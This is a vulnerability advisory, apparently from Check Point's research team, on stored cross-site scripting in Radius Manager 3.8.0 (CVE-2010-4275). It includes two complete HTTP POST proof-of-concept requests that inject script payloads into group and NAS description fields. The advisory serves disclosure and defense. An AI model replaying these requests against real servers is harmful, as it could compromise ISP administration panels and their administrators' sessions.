91 lines
No EOL
3.2 KiB
Text
91 lines
No EOL
3.2 KiB
Text
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
|
|
http://www.checkpoint.com/defense/
|
|
|
|
Radius Manager Multiple Cross Site Scripting Issues
|
|
CVE-2010-4275
|
|
|
|
|
|
INTRODUCTION
|
|
|
|
Radius Manager is a centralized way for administration of Mikrotik, Cisco, Chillispot and StarOS routers and wireless
|
|
access points. It has
|
|
a centralized accounting system that uses Radius, provinding easy user and accounting management for ISP's.
|
|
|
|
This problem was confirmed in the following versions of the Radius Manager, other versions maybe also affected.
|
|
|
|
Radius Manager 3.8.0
|
|
|
|
|
|
CVSS Scoring System
|
|
|
|
The CVSS score is: 6.4
|
|
Base Score: 6.7
|
|
Temporal Score: 6.4
|
|
We used the following values to calculate the scores:
|
|
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
|
|
Temporal score is: E:F/RL:U/RC:C
|
|
|
|
|
|
DETAILS
|
|
|
|
The Radius Manager system is affected by Multiple Stored Cross Site Scripting. The “Group Name” and “Description” in
|
|
“new_usergroup” menu do not
|
|
sanitize input data, allowing attacker to store malicious javascript code in a page.
|
|
|
|
The same thing occurs with “new_nas” menu
|
|
|
|
Request:
|
|
http://<server>/admin.php?cont=update_usergroup&id=1
|
|
POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1
|
|
Host: <server>
|
|
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914
|
|
Firefox/3.6.10
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-us,en;q=0.5
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
Keep-Alive: 115
|
|
Connection: keep-alive
|
|
Referer: http://<server>/admin.php?cont=edit_usergroup&id=1
|
|
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC;
|
|
listusers_ordercol=username;
|
|
listusers_ordertype=DESC; listusers_lastorder=username
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 120
|
|
name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update
|
|
|
|
Request 2:
|
|
http://<serveR>/admin.php?cont=store_nas
|
|
POST /admin.php?cont=store_nas HTTP/1.1
|
|
Host: <server>
|
|
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914
|
|
Firefox/3.6.10
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-us,en;q=0.5
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
Keep-Alive: 115
|
|
Connection: keep-alive
|
|
Referer: http://<server>/admin.php?cont=new_nas
|
|
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC;
|
|
listusers_ordercol=username;
|
|
listusers_ordertype=DESC; listusers_lastorder=username
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 112
|
|
name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS
|
|
|
|
|
|
|
|
CREDITS
|
|
|
|
This vulnerability has been brought to our attention by Ulisses Castro from Conviso IT Security company
|
|
(http://www.conviso.com.br) and researched
|
|
internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).
|
|
|
|
|
|
|
|
Rodrigo Rubira Branco
|
|
Senior Security Researcher
|
|
Vulnerability Discovery Team (VDT)
|
|
Check Point Software Technologies
|
|
http://www.checkpoint.com/defense |